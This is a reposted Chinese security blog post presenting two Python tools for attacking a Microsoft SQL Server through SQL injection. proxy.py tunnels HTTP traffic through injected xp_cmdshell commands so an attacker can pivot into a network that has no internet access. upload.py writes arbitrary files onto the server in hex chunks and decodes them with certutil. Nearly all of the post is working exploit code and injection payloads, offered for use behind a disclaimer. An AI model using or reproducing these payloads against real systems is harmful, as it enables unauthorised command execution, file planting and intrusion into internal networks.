一个能够利用MSSQL的xp_cmdshell功能来进行流量代理的脚本,用于在站酷分离且不出网SQL注入进行代理
2024-1-8 08:3:57 Author: 李白你好(查看原文) 阅读量:45 收藏

免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

1

工具介绍

一个能够利用MSSQL的xp_cmdshell功能来进行流量代理的脚本,用于在站酷分离且不出网SQL注入进行代理。

2

其它

1、upload.py 能够方便的通过SQL注入上传文件

2、proxy.py 能够进行代理,但是在使用前记得更改 exec_xp_cmdshell 函数里的注入方法,根据自己的注入点灵活变通

3

TODO

  •  支持 HTTPS 代理

  •  支持 Socks 代理

4

脚本

proxy.py

import base64import binasciiimport requestsfrom flask import Flask, request, make_responseimport re
regex = 'MSSQL Proxy(.+?)MSSQL Proxy'script_path = "C:/Users/MSSQLSERVER/AppData/Local/Temp/mssql_proxy.ps1"app = Flask(__name__)

def exec_xp_cmdshell(cmd): url = 'http://10.37.129.4/sql.php' payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify( cmd.encode()).decode()
requests.post(url, data={'id': "1'; DELETE FROM sqlmapoutput-- ZKN"}) requests.post(url, data={"id": payload})
res = requests.post(url, data={ "id": "1' UNION ALL SELECT NULL, 'MSSQL Proxy' + ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) + 'MSSQL Proxy',NULL FROM sqlmapoutput ORDER BY id-- ZKN" }) return ''.join(re.findall(regex, res.text))

def send_package(ip, port, data): cmd = "powershell {script_path} -remoteHost {ip} -port {port} -sendData {data}".format( script_path=script_path, ip=ip, port=port, data=data ) print(cmd) return exec_xp_cmdshell(cmd)

def clean_up_response(response): response = binascii.unhexlify(response.strip().encode()).decode() headers = response.split('\r\n\r\n')[0] body = '\r\n\r\n'.join(response.split('\r\n\r\n')[1:]).strip() res = make_response(body) res.status = ' '.join(headers.split('\r\n')[0].split(' ')[1:]) for header in headers.split('\r\n')[1:]: res.headers[header.split(':')[0]] = ':'.join(header.split(':')[1:]) return res

@app.before_requestdef before_request(): if request.method == 'CONNECT': return package = '{method} {path} {version}\r\n'.format( method=request.method, path=request.full_path, version=request.environ['SERVER_PROTOCOL'] ).encode() host = '' for k, v in dict(request.headers).items(): if k.upper() == 'Connection'.upper(): package += b'Connection: close\r\n' continue if k.upper() == 'HOST': host = v package += '{k}: {v}\r\n'.format(k=k, v=v).encode() package += b'\r\n' package += request.stream.read() # print(package) if not host: return "HostNotFound\r--MSSQL Proxy" if len(host.split(':')) > 1: ip, port = host.split(':') else: ip, port = host, 80 response = send_package(ip, port, base64.b64encode(package).decode()) if response.strip() == 'FAILED': return "Failed\r--MSSQL Proxy", 902 return clean_up_response(response)

if __name__ == '__main__': app.run(debug=True, host='0.0.0.0', port=4000)

upload.py

import binasciiimport sysimport requests

def exec_xp_cmdshell(cmd): url = 'http://10.37.129.4/sql.php' payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify( cmd.encode()).decode() requests.post(url, data={"id": payload})

def main(): if len(sys.argv) < 3: print("Usage: python3 upload.py local_file_to_read remote_path_to_save") sys.exit(1)
cmd = '''>>"{path}" set /p="{content}"<nul''' file = open(sys.argv[1], 'rb') path_to_save = sys.argv[2] exec_xp_cmdshell('cd . > "{}"'.format(path_to_save + '.tmp')) while 1: content = file.read(512) payload = cmd.format(path=path_to_save + '.tmp', content=binascii.hexlify(content).decode()) exec_xp_cmdshell(payload) if len(content) < 512: break exec_xp_cmdshell('certUtil -decodehex "{old_path}" "{new_path}"'.format(old_path=path_to_save + '.tmp', new_path=path_to_save)) exec_xp_cmdshell('del "{}"'.format(path_to_save + '.tmp')) print('Uploaded successfully!')

if __name__ == '__main__': main()

5

往期精彩

一个搜索网络安全领域论文的工具

公众号文案推广诈骗套路|分析一波这个背后的秘密

攻击面发现平台对比


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247503036&idx=1&sn=03eae8caa2a94d8758bdfdf33b2a9d51&chksm=c12971600a31ec501c46fdd2fabacd808a0f99a5da2d7f502323e943132aa81a4ab93208065a&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh